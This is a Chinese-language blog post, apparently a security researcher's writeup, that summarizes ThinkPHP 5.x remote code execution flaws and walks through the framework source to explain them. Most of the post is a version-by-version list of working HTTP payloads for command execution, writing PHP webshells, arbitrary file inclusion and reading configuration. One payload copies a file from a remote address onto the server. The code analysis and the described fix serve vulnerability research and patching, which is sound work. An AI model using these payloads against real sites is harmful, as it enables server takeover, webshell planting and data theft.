• Thinkphp5 RCE总结


    thinkphp5最出名的就是rce,我先总结rce,rce有两个大版本的分别

    1. ThinkPHP 5.0-5.0.24
    2. ThinkPHP 5.1.0-5.1.30

    因为漏洞触发点和版本的不同,导致payload分为多种,其中一些payload需要取决于debug选项
    比如直接访问路由触发的

    5.1.x :

    ?s=index/thinkRequest/input&filter[]=system&data=pwd
    ?s=index/thinkviewdriverPhp/display&content=<?php phpinfo();?>
    ?s=index/thinktemplatedriverfile/write&cacheFile=shell.php&content=<?php phpinfo();?>
    ?s=index/thinkContainer/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
    ?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
    

    5.0.x :

    ?s=index/thinkconfig/get&name=database.username # 获取配置信息
    ?s=index/thinkLang/load&file=../../test.jpg    # 包含任意文件
    ?s=index/thinkConfig/load&file=../../t.php     # 包含任意.php文件
    ?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
    ?s=index|thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=whoami
    

    还有一种

    http://php.local/thinkphp5.0.5/public/index.php?s=index
    post
    _method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo
    _method=__construct&filter[]=system&method=GET&get[]=whoami
    
    # ThinkPHP <= 5.0.13
    POST /?s=index/index
    s=whoami&_method=__construct&method=&filter[]=system
    
    # ThinkPHP <= 5.0.23、5.1.0 <= 5.1.16 需要开启框架app_debug
    POST /
    _method=__construct&filter[]=system&server[REQUEST_METHOD]=ls -al
    
    # ThinkPHP <= 5.0.23 需要存在xxx的method路由,例如captcha
    POST /?s=xxx HTTP/1.1
    _method=__construct&filter[]=system&method=get&get[]=ls+-al
    _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls
    

    可以看到payload分为两种类型,一种是因为Request类的method__construct方法造成的,另一种是因为Request类在兼容模式下获取的控制器没有进行合法校验,我们下面分两种来讲,然后会将thinkphp5的每个小版本都测试下找下可用的payload。

    thinkphp5 method任意调用方法导致rce

    php5.4.45+phpstudy+thinkphp5.0.5+phpstorm+xdebug

    创建项目

    composer create-project topthink/think=5.0.5 thinkphp5.0.5  --prefer-dist
    

    我这边创建完项目之后拿到的版本不是5.0.5的,如果你的也不是就把compsoer.json里的require字段改为

    "require": {
        "php": ">=5.4.0",
        "topthink/framework": "5.0.5"
    },
    
    JSON

    然后运行compsoer update

    漏洞分析

    thinkphp/library/think/Request.php:504 Request类的method方法

     

    image
     

    可以通过POST数组传入__method改变$this->{$this->method}($_POST);达到任意调用此类中的方法。

    然后我们再来看这个类中的__contruct方法

    protected function __construct($options = [])
    {
        foreach ($options as $name => $item) {
            if (property_exists($this, $name)) {
                $this->$name = $item;
            }
        }
        if (is_null($this->filter)) {
            $this->filter = Config::get('default_filter');
        }
        // 保存 php://input
        $this->input = file_get_contents('php://input');
    }
    
    PHP

    重点是在foreach中,可以覆盖类属性,那么我们可以通过覆盖Request类的属性

     

    image
     

    这样filter就被赋值为system()了,在哪调用的呢?我们要追踪下thinkphp的运行流程
    thinkphp是单程序入口,入口在public/index.php,在index.php中

    require __DIR__ . '/../thinkphp/start.php';
    

    引入框架的start.php,跟进之后调用了App类的静态run()方法

     

    image
     

    看下run()方法的定义

    public static function run(Request $request = null)
    {
        ...省略...
            // 获取应用调度信息
            $dispatch = self::$dispatch;
        if (empty($dispatch)) {
            // 进行URL路由检测
            $dispatch = self::routeCheck($request, $config);
        }
        // 记录当前调度信息
        $request->dispatch($dispatch);
    
        // 记录路由和请求信息
        if (self::$debug) {
            Log::record('[ ROUTE ] ' . var_export($dispatch, true), 'info');
            Log::record('[ HEADER ] ' . var_export($request->header(), true), 'info');
            Log::record('[ PARAM ] ' . var_export($request->param(), true), 'info');
        }
        ...省略...
            switch ($dispatch['type']) {
                case 'redirect':
                    // 执行重定向跳转
                    $data = Response::create($dispatch['url'], 'redirect')->code($dispatch['status']);
                    break;
                case 'module':
                    // 模块/控制器/操作
                    $data = self::module($dispatch['module'], $config, isset($dispatch['convert']) ? $dispatch['convert'] : null);
                    break;
                case 'controller':
                    // 执行控制器操作
                    $vars = array_merge(Request::instance()->param(), $dispatch['var']);
                    $data = Loader::action($dispatch['controller'], $vars, $config['url_controller_layer'], $config['controller_suffix']);
                    break;
                case 'method':
                    // 执行回调方法
                    $vars = array_merge(Request::instance()->param(), $dispatch['var']);
                    $data = self::invokeMethod($dispatch['method'], $vars);
                    break;
                case 'function':
                    // 执行闭包
                    $data = self::invokeFunction($dispatch['function']);
                    break;
                case 'response':
                    $data = $dispatch['response'];
                    break;
                default:
                    throw new InvalidArgumentException('dispatch type not support');
            }
    }
    
    PHP

    首先是经过$dispatch = self::routeCheck($request, $config)检查调用的路由,然后会根据debug开关来选择是否执行Request::instance()->param(),然后是一个switch语句,当$dispatch等于controller或者method时会执行Request::instance()->param(),只要是存在的路由就可以进入这两个case分支。

    而在 ThinkPHP5 完整版中,定义了验证码类的路由地址?s=captcha,默认这个方法就能使$dispatch=method从而进入Request::instance()->param()

    我们继续跟进Request::instance()->param()

     

    image
     

    执行合并参数判断请求类型之后return了一个input()方法,跟进

     

    image
     

    将被__contruct覆盖掉的filter字段回调进filterValue(),这个方法我们需要特别关注了,因为 Request 类中的 param、route、get、post、put、delete、patch、request、session、server、env、cookie、input 方法均调用了 filterValue 方法,而该方法中就存在可利用的 call_user_func 函数。跟进

     

    image
     

    call_user_func调用system造成rce。

    梳理一下:$this->method可控导致可以调用__contruct()覆盖Request类的filter字段,然后App::run()执行判断debug来决定是否执行$request->param(),并且还有$dispatch['type'] 等于controller或者 method 时也会执行$request->param(),而$request->param()会进入到input()方法,在这个方法中将被覆盖的filter回调call_user_func(),造成rce。

    最后借用七月火师傅的一张流程图

    image
     

    method __contruct导致的rce 各版本payload

    一个一个版本测试,测试选项有命令执行、写shell、debug选项

    5.0

    debug 无关
    命令执行

    POST ?s=index/index
    s=whoami&_method=__construct&method=POST&filter[]=system
    aaaa=whoami&_method=__construct&method=GET&filter[]=system
    _method=__construct&method=GET&filter[]=system&get[]=whoami
    

    写shell

    POST
    s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
    

    5.0.1

    debug 无关
    命令执行

    POST ?s=index/index
    s=whoami&_method=__construct&method=POST&filter[]=system
    aaaa=whoami&_method=__construct&method=GET&filter[]=system
    _method=__construct&method=GET&filter[]=system&get[]=whoami
    

    写shell

    POST
    s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
    

    5.0.2

    debug 无关
    命令执行

    POST ?s=index/index
    s=whoami&_method=__construct&method=POST&filter[]=system
    aaaa=whoami&_method=__construct&method=GET&filter[]=system
    _method=__construct&method=GET&filter[]=system&get[]=whoami
    

    写shell

    POST
    s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
    

    5.0.3

    debug 无关
    命令执行

    POST ?s=index/index
    s=whoami&_method=__construct&method=POST&filter[]=system
    aaaa=whoami&_method=__construct&method=GET&filter[]=system
    _method=__construct&method=GET&filter[]=system&get[]=whoami
    

    写shell

    POST
    s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
    

    5.0.4

    debug 无关
    命令执行

    POST ?s=index/index
    s=whoami&_method=__construct&method=POST&filter[]=system
    aaaa=whoami&_method=__construct&method=GET&filter[]=system
    _method=__construct&method=GET&filter[]=system&get[]=whoami
    

    写shell

    POST
    s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
    

    5.0.5

    debug 无关
    命令执行

    POST ?s=index/index
    s=whoami&_method=__construct&method=POST&filter[]=system
    aaaa=whoami&_method=__construct&method=GET&filter[]=system
    _method=__construct&method=GET&filter[]=system&get[]=whoami
    

    写shell

    POST
    s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
    

    5.0.6

    debug 无关
    命令执行

    POST ?s=index/index
    s=whoami&_method=__construct&method=POST&filter[]=system
    aaaa=whoami&_method=__construct&method=GET&filter[]=system
    _method=__construct&method=GET&filter[]=system&get[]=whoami
    

    写shell

    POST
    s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
    

    5.0.7

    debug 无关
    命令执行

    POST ?s=index/index
    s=whoami&_method=__construct&method=POST&filter[]=system
    aaaa=whoami&_method=__construct&method=GET&filter[]=system
    _method=__construct&method=GET&filter[]=system&get[]=whoami
    

    写shell

    POST
    s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
    

    5.0.8

    debug 无关
    命令执行

    POST ?s=index/index
    s=whoami&_method=__construct&method=POST&filter[]=system
    aaaa=whoami&_method=__construct&method=GET&filter[]=system
    _method=__construct&method=GET&filter[]=system&get[]=whoami
    c=system&f=calc&_method=filter
    

    写shell

    POST
    s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
    

    5.0.9

    debug 无关
    命令执行

    POST ?s=index/index
    s=whoami&_method=__construct&method=POST&filter[]=system
    aaaa=whoami&_method=__construct&method=GET&filter[]=system
    _method=__construct&method=GET&filter[]=system&get[]=whoami
    c=system&f=calc&_method=filter
    

    写shell

    POST
    s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
    

    5.0.10

    从5.0.10开始默认debug=false,debug无关
    命令执行

    POST ?s=index/index
    s=whoami&_method=__construct&method=POST&filter[]=system
    aaaa=whoami&_method=__construct&method=GET&filter[]=system
    _method=__construct&method=GET&filter[]=system&get[]=whoami
    c=system&f=calc&_method=filter
    

    写shell

    POST
    s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
    

    5.0.11

    默认debug=false,debug无关
    命令执行

    POST ?s=index/index
    s=whoami&_method=__construct&method=POST&filter[]=system
    aaaa=whoami&_method=__construct&method=GET&filter[]=system
    _method=__construct&method=GET&filter[]=system&get[]=whoami
    c=system&f=calc&_method=filter
    

    写shell

    POST
    s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
    

    5.0.12

    默认debug=false,debug无关
    命令执行

    POST ?s=index/index
    s=whoami&_method=__construct&method=POST&filter[]=system
    aaaa=whoami&_method=__construct&method=GET&filter[]=system
    _method=__construct&method=GET&filter[]=system&get[]=whoami
    c=system&f=calc&_method=filter
    

    写shell

    POST
    s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
    

    5.0.13

    默认debug=false,需要开启debug
    命令执行

    POST ?s=index/index
    s=whoami&_method=__construct&method=POST&filter[]=system
    aaaa=whoami&_method=__construct&method=GET&filter[]=system
    _method=__construct&method=GET&filter[]=system&get[]=whoami
    c=system&f=calc&_method=filter
    

    写shell

    POST
    s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
    

    版本和DEBUG选项的关系

    5.0.13版本之后需要开启debug才能rce,为什么?比较一下5.0.13和5.0.5版本的代码

    https://github.com/top-think/framework/compare/v5.0.5…v5.0.13#diff-d86cf2606459bf4da21b7c3a1f7191f3

    可见多了一个exec方法把switch ($dispatch['type'])摘出来了,然后在case module中执行了module(),在module()中多了两行。

    // 设置默认过滤机制
    $request->filter($config['default_filter']);
    

    问题就出在这,回顾我们上文分析5.0.5,是从App::run()方法中第一次加载默认filter位置: thinkphp/library/think/App.php

    $request->filter($config['default_filter']);
    

    在覆盖的时候可以看到,默认default_filter是为空字符串,所以最后便是进入了$this->filter = $filter导致system值变为空。

    public function filter($filter = null){
            if (is_null($filter)) {
                return $this->filter;
            } else {
                $this->filter = $filter;
            }
    }
    
    PHP

    接下来就是我们进入了路由check,从而覆盖filter的值为system

    image
     

    但是在5.0.13中,摘出来的exec()中的module()方法thinkphp/library/think/App.php:544 会重新执行一次$request->filter($config['default_filter']); 把我们覆盖好的system重新变为了空,导致失败。

    那为什么开了debug就可以rce?

    image
     


    这里会先调用$request->param(),然后在执行self::exec($dispatch, $config),造成rce。

    那有没有别的办法不开debug直接rce呢?
    和debug的原理一样,switch的时候进入module分支会被覆盖,那就进入到其他的分支。

    image
     


    在thinkphp5完整版中官网揉进去了一个验证码的路由,可以通过这个路由触发rce

    这个是我在5.0.13下试出来的payload "topthink/think-captcha": "^1.0"

    POST ?s=captcha/calc
    _method=__construct&filter[]=system&method=GET
    

    我们继续

    5.0.13补充

    补充
    有captcha路由时无需debug=true

    POST ?s=captcha/calc
    _method=__construct&filter[]=system&method=GET
    

    5.0.14

    默认debug=false,需要开启debug
    命令执行

    POST ?s=index/index
    s=whoami&_method=__construct&method=POST&filter[]=system
    aaaa=whoami&_method=__construct&method=GET&filter[]=system
    _method=__construct&method=GET&filter[]=system&get[]=whoami
    c=system&f=calc&_method=filter
    

    写shell

    POST
    s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
    

    有captcha路由时无需debug=true

    POST ?s=captcha/calc
    _method=__construct&filter[]=system&method=GET
    

    5.0.15

    默认debug=false,需要开启debug
    命令执行

    POST ?s=index/index
    s=whoami&_method=__construct&method=POST&filter[]=system
    aaaa=whoami&_method=__construct&method=GET&filter[]=system
    _method=__construct&method=GET&filter[]=system&get[]=whoami
    c=system&f=calc&_method=filter
    

    写shell

    POST
    s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
    

    有captcha路由时无需debug=true

    POST ?s=captcha/calc
    _method=__construct&filter[]=system&method=GET
    

    5.0.16

    默认debug=false,需要开启debug
    命令执行

    POST ?s=index/index
    s=whoami&_method=__construct&method=POST&filter[]=system
    aaaa=whoami&_method=__construct&method=GET&filter[]=system
    _method=__construct&method=GET&filter[]=system&get[]=whoami
    c=system&f=calc&_method=filter
    

    写shell

    POST
    s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
    

    有captcha路由时无需debug=true

    POST ?s=captcha/calc
    _method=__construct&filter[]=system&method=GET
    

    5.0.17

    默认debug=false,需要开启debug
    命令执行

    POST ?s=index/index
    s=whoami&_method=__construct&method=POST&filter[]=system
    aaaa=whoami&_method=__construct&method=GET&filter[]=system
    _method=__construct&method=GET&filter[]=system&get[]=whoami
    c=system&f=calc&_method=filter
    

    写shell

    POST
    s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
    

    有captcha路由时无需debug=true

    POST ?s=captcha/calc
    _method=__construct&filter[]=system&method=GET
    

    5.0.18

    默认debug=false,需要开启debug
    命令执行

    POST ?s=index/index
    s=whoami&_method=__construct&method=POST&filter[]=system
    aaaa=whoami&_method=__construct&method=GET&filter[]=system
    _method=__construct&method=GET&filter[]=system&get[]=whoami
    c=system&f=calc&_method=filter
    

    写shell

    POST
    s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
    

    有captcha路由时无需debug=true

    POST ?s=captcha/calc
    _method=__construct&filter[]=system&method=GET
    

    5.0.19

    默认debug=false,需要开启debug
    命令执行

    POST ?s=index/index
    s=whoami&_method=__construct&method=POST&filter[]=system
    aaaa=whoami&_method=__construct&method=GET&filter[]=system
    _method=__construct&method=GET&filter[]=system&get[]=whoami
    c=system&f=calc&_method=filter
    

    写shell

    POST
    s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
    

    有captcha路由时无需debug=true

    POST ?s=captcha/calc
    _method=__construct&filter[]=system&method=GET
    

    5.0.20

    默认debug=false,需要开启debug
    命令执行

    POST ?s=index/index
    s=whoami&_method=__construct&method=POST&filter[]=system
    aaaa=whoami&_method=__construct&method=GET&filter[]=system
    _method=__construct&method=GET&filter[]=system&get[]=whoami
    c=system&f=calc&_method=filter
    

    写shell

    POST
    s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
    

    有captcha路由时无需debug=true

    POST ?s=captcha/calc
    _method=__construct&filter[]=system&method=GET
    

    5.0.21

    默认debug=false,需要开启debug
    命令执行

    POST ?s=index/index
    _method=__construct&filter[]=system&server[REQUEST_METHOD]=calc
    

    写shell

    POST
    _method=__construct&filter[]=assert&server[REQUEST_METHOD]=file_put_contents('Y4er.php','<?php phpinfo();')
    

    有captcha路由时无需debug=true

    POST ?s=captcha/calc
    _method=__construct&filter[]=system&method=GET
    POST ?s=captcha
    _method=__construct&filter[]=system&server[REQUEST_METHOD]=calc&method=get
    

    5.0.22

    默认debug=false,需要开启debug
    命令执行

    POST ?s=index/index
    _method=__construct&filter[]=system&server[REQUEST_METHOD]=calc
    

    写shell

    POST
    _method=__construct&filter[]=assert&server[REQUEST_METHOD]=file_put_contents('Y4er.php','<?php phpinfo();')
    

    有captcha路由时无需debug=true

    POST ?s=captcha/calc
    _method=__construct&filter[]=system&method=GET
    POST ?s=captcha
    _method=__construct&filter[]=system&server[REQUEST_METHOD]=calc&method=get
    

    5.0.23

    默认debug=false,需要开启debug
    命令执行

    POST ?s=index/index
    _method=__construct&filter[]=system&server[REQUEST_METHOD]=calc
    

    写shell

    POST
    _method=__construct&filter[]=assert&server[REQUEST_METHOD]=file_put_contents('Y4er.php','<?php phpinfo();')
    

    有captcha路由时无需debug=true

    POST ?s=captcha/calc
    _method=__construct&filter[]=system&method=GET
    POST ?s=captcha
    _method=__construct&filter[]=system&server[REQUEST_METHOD]=calc&method=get
    

    5.0.24

    作为5.0.x的最后一个版本,rce被修复

    5.1.0

    默认debug为true
    命令执行

    POST ?s=index/index
    _method=__construct&filter[]=system&method=GET&s=calc
    

    写shell

    POST
    s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
    

    有captcha路由时无需debug=true
    "topthink/think-captcha": "2.*"

    POST ?s=captcha/calc
    _method=__construct&filter[]=system&method=GET
    POST ?s=captcha
    _method=__construct&filter[]=system&s=calc&method=get
    

    5.1.1

    命令执行

    POST ?s=index/index
    _method=__construct&filter[]=system&method=GET&s=calc
    

    写shell

    POST
    s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert
    

    有captcha路由时无需debug=true

    POST ?s=captcha/calc
    _method=__construct&filter[]=system&method=GET
    POST ?s=captcha
    _method=__construct&filter[]=system&s=calc&method=get
    

    至此,不再一个一个版本测了,费时费力。
    基于__construct的payload大部分出现在5.0.x及低版本的5.1.x中。下文分析另一种rce。

    未开启强制路由导致rce

    这种rce的payload多形如

    ?s=index/thinkRequest/input&filter[]=system&data=pwd
    ?s=index/thinkviewdriverPhp/display&content=<?php phpinfo();?>
    ?s=index/thinktemplatedriverfile/write&cacheFile=shell.php&content=<?php phpinfo();?>
    ?s=index/thinkContainer/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
    ?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
    

    环境

    "require": {
        "php": ">=5.6.0",
        "topthink/framework": "5.1.29",
        "topthink/think-captcha": "2.*"
    },
    
    JSON

    分析

     

    image
     


    thinkphp默认没有开启强制路由,而且默认开启路由兼容模式。那么我们可以用兼容模式来调用控制器,当没有对控制器过滤时,我们可以调用任意的方法来执行。上文提到所有用户参数都会经过 Request 类的 input 方法处理,该方法会调用 filterValue 方法,而 filterValue 方法中使用了 call_user_func ,那么我们就来尝试利用这个方法。访问

    http://php.local/thinkphp5.1.30/public/?s=index/thinkRequest/input&filter[]=system&data=whoami
    

    打断点跟进到thinkphp/library/think/App.php:402

     

    image
     

    routeCheck()返回$dispatch是将 / 用 | 替换

     

    image
     

    然后进入init()

    public function init()
        {
            // 解析默认的URL规则
            $result = $this->parseUrl($this->dispatch);
    
            return (new Module($this->request, $this->rule, $result))->init();
        }
    
    PHP

    进入parseUrl()

     

    image
     

    进入parseUrlPath()

     

    image
     

    在此处从url中获取[模块/控制器/操作],导致parseUrl()返回的route为

    image
     

    导致thinkphp/library/think/App.php:406$dispatch

     

    image
     

    直接调用了input()函数,然后会执行到 App 类的 run 方法,进而调用 Dispatch 类的 run 方法,该方法会调用关键函数 exec thinkphp/library/think/route/dispatch/Module.php:84,进而调用反射类

    image
     

    此时反射类的参数均可控,调用input()

     

    image
     

    在进入input()之后继续进入$this->filterValue()

     

    image
     

    跟进后执行call_user_func(),实现rce

     

    image
     


    整个流程中没有对控制器进行合法校验,导致可以调用任意控制器,实现rce。

    修复

    // 获取控制器名
    $controller = strip_tags($result[1] ?: $config['default_controller']);
    
    if (!preg_match('/^[A-Za-z](w|.)*$/', $controller)) {
        throw new HttpException(404, 'controller not exists:' . $controller);
    }
    

    大于5.0.23、大于5.1.30获取时使用正则匹配校验

    payload

    命令执行

    5.0.x
    ?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
    5.1.x
    ?s=index/thinkRequest/input&filter[]=system&data=pwd
    ?s=index/thinkContainer/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
    ?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
    

    写shell

    5.0.x
    ?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=copy(%27远程地址%27,%27333.php%27)
    5.1.x
    ?s=index/thinktemplatedriverfile/write&cacheFile=shell.php&content=<?php phpinfo();?>
    ?s=index/thinkviewdriverThink/display&template=<?php phpinfo();?>             //shell生成在runtime/temp/md5(template).php
    ?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=copy(%27远程地址%27,%27333.php%27)
    

    其他

    5.0.x
    ?s=index/thinkconfig/get&name=database.username # 获取配置信息
    ?s=index/thinkLang/load&file=../../test.jpg    # 包含任意文件
    ?s=index/thinkConfig/load&file=../../t.php     # 包含任意.php文件
    

    如果你碰到了控制器不存在的情况,是因为在tp获取控制器时,thinkphp/library/think/App.php:561会把url转为小写,导致控制器加载失败。

    image
     

    总结

    其实thinkphp的rce差不多都被拦截了,我们其实更需要将rce转化为其他姿势,比如文件包含去包含日志,或者转向反序列化。姿势太多,总结不过来,这篇文章就到这里把。

    参考

    • https://xz.aliyun.com/t/6106
    • https://www.cnblogs.com/iamstudy/articles/thinkphp_5_x_rce_1.html
    • https://github.com/Mochazz/ThinkPHP-Vuln
    • https://xz.aliyun.com/search?keyword=thinkphp
    • https://github.com/Lucifer1993/TPscan
    • https://www.kancloud.cn/manual/thinkphp5_1/353946
    • https://www.kancloud.cn/manual/thinkphp5
    • https://github.com/top-think/thinkphp
  • 相关阅读:
    第三章 Selenide测试框架
    第二章 自动化测试的本质理解
    第一章 软件自动化测试的基础知识
    【算法学习】03---算法分析学习
    【算法学习】03---算法分析
    【算法学习】02---二分算法总结
    【算法学习】01---java基础以及算法基础常用类库
    前端自动化测试一些学习记录
    Ubuntu下安装Sublime3的Markdown插件
    octopress搭建记录
  • 原文地址:https://www.cnblogs.com/nongchaoer/p/12029478.html
Copyright © 2020-2023  润新知